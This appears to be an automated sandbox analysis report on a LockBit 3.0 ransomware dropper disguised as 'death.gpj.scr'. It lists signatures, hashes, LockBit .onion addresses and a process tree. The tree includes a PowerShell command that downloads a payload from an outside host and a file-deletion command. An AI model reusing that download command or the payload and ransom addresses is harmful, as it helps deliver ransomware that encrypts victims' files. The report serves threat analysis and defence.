Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-09-2024 12:45
Static task
static1
Behavioral task
behavioral1
Sample
private server/death.gpj.scr
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
private server/death.gpj.scr
Resource
win10v2004-20240802-en
General
-
Target
private server/death.gpj.scr
-
Size
466KB
-
MD5
0fdbc8c24e84eea10dc25e81765014a1
-
SHA1
2d566a2b94fc8b16b97200392db1bbe714c31289
-
SHA256
e173dd358ec750f561ec4eec0c6d75e8709bc32fbe43a5e9a92dd0db96c82b58
-
SHA512
3cb0c09cc5303f7842fd5ba79a118f62586c4f494a2168c6103db55697fe9dc063f866ec5ee8fc208e01cfe7d7e6b044847c824ee28ed7b4ba41d035fb7da72f
-
SSDEEP
12288:CgZXEAO/BUdG3gVdt7Kdm5bakhM/7xah42prW1:CgZXoZUTVdt7K0JakhM1ah42prW1
Malware Config
Extracted
https://master-repogen.vercel.app/file/server.scr
Extracted
C:\wlJ8FiR2h.README.txt
lockbit
http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
http://lockbitsupp.uz
http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion
http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion
http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion
Signatures
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
Processes:
resource yara_rule behavioral2/files/0x000b00000002340c-34.dat family_lockbit -
Renames multiple (603) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 14 3932 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
death.gpj.scr8D6.tmpdescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation death.gpj.scr Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation 8D6.tmp -
Executes dropped EXE 2 IoCs
Processes:
server.scr8D6.tmppid Process 5020 server.scr 1692 8D6.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 2 IoCs
Processes:
server.scrdescription ioc Process File opened for modification C:\$Recycle.Bin\S-1-5-21-4182098368-2521458979-3782681353-1000\desktop.ini server.scr File opened for modification F:\$RECYCLE.BIN\S-1-5-21-4182098368-2521458979-3782681353-1000\desktop.ini server.scr -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 4 IoCs
Processes:
printfilterpipelinesvc.exesplwow64.exedescription ioc Process File created C:\Windows\system32\spool\PRINTERS\PPe_c0n4k0wglgjsbpw7eqqo1jc.TMP printfilterpipelinesvc.exe File created C:\Windows\system32\spool\PRINTERS\PP0lcdus7canl_0chvim02etpjc.TMP printfilterpipelinesvc.exe File created C:\Windows\system32\spool\PRINTERS\00002.SPL splwow64.exe File created C:\Windows\system32\spool\PRINTERS\PP4dz_qcfybcl248mf4njw03mwb.TMP printfilterpipelinesvc.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
server.scrdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\wlJ8FiR2h.bmp" server.scr Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\wlJ8FiR2h.bmp" server.scr -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
8D6.tmppid Process 1692 8D6.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
death.gpj.scrcmd.exepowershell.exeserver.scr8D6.tmpcmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language death.gpj.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8D6.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
ONENOTE.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ONENOTE.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
ONENOTE.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily ONENOTE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ONENOTE.EXE -
Modifies Control Panel 2 IoCs
Processes:
server.scrdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\WallpaperStyle = "10" server.scr Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop server.scr -
Modifies registry class 5 IoCs
Processes:
server.scrdescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wlJ8FiR2h server.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wlJ8FiR2h\ = "wlJ8FiR2h" server.scr Key created \REGISTRY\MACHINE\SOFTWARE\Classes\wlJ8FiR2h\DefaultIcon server.scr Key created \REGISTRY\MACHINE\SOFTWARE\Classes\wlJ8FiR2h server.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\wlJ8FiR2h\DefaultIcon\ = "C:\\ProgramData\\wlJ8FiR2h.ico" server.scr -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeserver.scrpid Process 3932 powershell.exe 3932 powershell.exe 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr 5020 server.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeserver.scrdescription pid Process Token: SeDebugPrivilege 3932 powershell.exe Token: SeAssignPrimaryTokenPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeDebugPrivilege 5020 server.scr Token: 36 5020 server.scr Token: SeImpersonatePrivilege 5020 server.scr Token: SeIncBasePriorityPrivilege 5020 server.scr Token: SeIncreaseQuotaPrivilege 5020 server.scr Token: 33 5020 server.scr Token: SeManageVolumePrivilege 5020 server.scr Token: SeProfSingleProcessPrivilege 5020 server.scr Token: SeRestorePrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSystemProfilePrivilege 5020 server.scr Token: SeTakeOwnershipPrivilege 5020 server.scr Token: SeShutdownPrivilege 5020 server.scr Token: SeDebugPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeBackupPrivilege 5020 server.scr Token: SeSecurityPrivilege 5020 server.scr -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
ONENOTE.EXEpid Process 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE 1536 ONENOTE.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
death.gpj.scrcmd.exeserver.scrprintfilterpipelinesvc.exe8D6.tmpdescription pid Process procid_target PID 1048 wrote to memory of 2336 1048 death.gpj.scr 90 PID 1048 wrote to memory of 2336 1048 death.gpj.scr 90 PID 1048 wrote to memory of 2336 1048 death.gpj.scr 90 PID 2336 wrote to memory of 3932 2336 cmd.exe 94 PID 2336 wrote to memory of 3932 2336 cmd.exe 94 PID 2336 wrote to memory of 3932 2336 cmd.exe 94 PID 2336 wrote to memory of 5020 2336 cmd.exe 95 PID 2336 wrote to memory of 5020 2336 cmd.exe 95 PID 2336 wrote to memory of 5020 2336 cmd.exe 95 PID 5020 wrote to memory of 1256 5020 server.scr 99 PID 5020 wrote to memory of 1256 5020 server.scr 99 PID 2088 wrote to memory of 1536 2088 printfilterpipelinesvc.exe 102 PID 2088 wrote to memory of 1536 2088 printfilterpipelinesvc.exe 102 PID 5020 wrote to memory of 1692 5020 server.scr 103 PID 5020 wrote to memory of 1692 5020 server.scr 103 PID 5020 wrote to memory of 1692 5020 server.scr 103 PID 5020 wrote to memory of 1692 5020 server.scr 103 PID 1692 wrote to memory of 3852 1692 8D6.tmp 104 PID 1692 wrote to memory of 3852 1692 8D6.tmp 104 PID 1692 wrote to memory of 3852 1692 8D6.tmp 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\private server\death.gpj.scr"C:\Users\Admin\AppData\Local\Temp\private server\death.gpj.scr" /S1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\private server\Dropper.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://master-repogen.vercel.app/file/server.scr', 'C:\Users\Admin\Downloads\server.scr')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Users\Admin\Downloads\server.scr"C:\Users\Admin\Downloads\server.scr"3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵
- Drops file in System32 directory
PID:1256
-
-
C:\ProgramData\8D6.tmp"C:\ProgramData\8D6.tmp"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\8D6.tmp >> NUL5⤵
- System Location Discovery: System Language Discovery
PID:3852
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:3296
-
C:\Windows\system32\printfilterpipelinesvc.exeC:\Windows\system32\printfilterpipelinesvc.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE/insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{58467E6A-F936-40D9-9677-C040014536CD}.xps" 1336992753274900002⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1536
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5442e3e612a38d7375a4cdf029a0c31fe
SHA12eceb4d69250cd30ece18e60c75cbe478920e43f
SHA256a0bf0e46d2fa96b2731961d4972c6eee3e369aaa59186c1bd4a2f9aa8593d8ec
SHA5123df0f050d5df148da2951822262068c1ab9be0d7026866c2767d5e46e4f5b0fc899a281de970c9551ad774b5ae1098033148503adf385842ee67c1aaad963bc9
-
Filesize
14KB
MD5294e9f64cb1642dd89229fff0592856b
SHA197b148c27f3da29ba7b18d6aee8a0db9102f47c9
SHA256917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2
SHA512b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
470B
MD58073ff57f855d5cd51346f011933d9fb
SHA1d24fc282fb660945b87e1c41860a031f6e7ec9f6
SHA2566bce98ce8751d6f87e97578a05e606a0b699f24c1a69b96cd28ef88d4984fe71
SHA5129f2e04c4f8bdeab0e2075b5bc42edbe6a9ee4221fbf1ebbacd44238576e77f7b2d5f5d3ac90d433b8b6f5493fef51747405e14a5aa2cf59a4663b2cf385b4610
-
Filesize
90KB
MD5c20d78b78197da4290b2afe81b0c2ccb
SHA128c75507d5d7d86a1af24c0edcd43c3364e9ce8a
SHA25604bc52e87077ef3d34d1800d40f7b2bcf079ea95317d3da26be35866640571fd
SHA512ee764e0cdd3feb59cc4ba5601b4a8537ee63b6260bc89628eaf427efd451782e73c6136ad4ebf8c77c0fc0be1ee88f43a41fbf883d385ebb1e945f0ee1ec6fec
-
Filesize
4KB
MD5c1ca27596e941a8776f1e0cd38a981cf
SHA145467b204d0faa7f9a7c273f1fdab1c25ee16119
SHA256e141bc56cd9539624d3b62c96f5c0406e35829021d2bde1d5cec2879e718f7d5
SHA512a358bed9ac3521cc38c0db472f9a92554b0fd9d5dadcaafa0c6967f2548eadea17abe4b38c0a94afb4adaadc86a34ba5848bb1d47dcd8eadae0dcfff3f1854e1
-
Filesize
4KB
MD5d5c98a9341a89d48c713bd8753f0d91f
SHA1501fe2616552ae15002969da7e6955470a8a3b70
SHA2567078dcf3da6b177541afdfb44c70f717b1861bb59ce5b4701cd4da180c611998
SHA5122f3b6ab4a9c7fb9ed24800218f623b682c918854a2625a4e81a712050f85e72a5150782e75b9723e62aa086bd9ba90dff487492b149696a9b61d8d660d9bf4ab
-
Filesize
150KB
MD54e2009a4722e15aa9a151ddae06fc95a
SHA1a80cca491c56a92b97839a2c7df59053a128671c
SHA256387359fb5b10320e99887ca7e4c719492a88e1a197c84469b0f781ea75b3e5a5
SHA512df48c334155b239ea4804637122aa5eb1a85a83d86d1f132ef095edcfc954029b7c685e19bdaa9664d902c3e8f4d13b9891d38179dd784bf715e4c68c6c1896e
-
Filesize
150KB
MD57e503c206e57f0295da017914a957d04
SHA196c375b9c57292db73c7ef2f2df16cf7be1604bb
SHA256274844568a6a9ce334d71efeac21f528d7b54b2cd4377c978cc1270c6ad986c4
SHA512cd4889ae107c54df854042e030eb431664d4db9d6dc908d1f1910ca49b89d247222f9d19440fcc2d9a120c95b56cd694750072ab9486eea961b8c33391344c1c
-
Filesize
3KB
MD5b9674de0868a93e9121bdb1d02d80130
SHA179d692fd03d3110a4358e2cc7442af9517489f3f
SHA2569268d24e96639cf4c0e8d74f9769092b415015692ea528820faaded6fc5b052c
SHA512b3264ad33eddedb2c18da883e2345247c762adc8a604991fce931cba06b86c361d23fa121e79d6c69948a2d5b9c1613139f401b971360d9d684abb5a61543c02
-
Filesize
129B
MD5a4a7bedfc515c69d11fbecc854e94b40
SHA1a26ec1f57e2b941fcacf3131d521d8cf0e0a308b
SHA2569dd8a702fd863f8388e6351d7fc1c8869a29ca2537168c3e8cad80a42d11aef5
SHA512ad618086ee6531e00eb39ae0eebfd4747ad74275e5cf45ae6edc349548e480679c518b175147ed52d22f843cff2111656ded1c8f32a08aa2fbc0396cbc8de7fa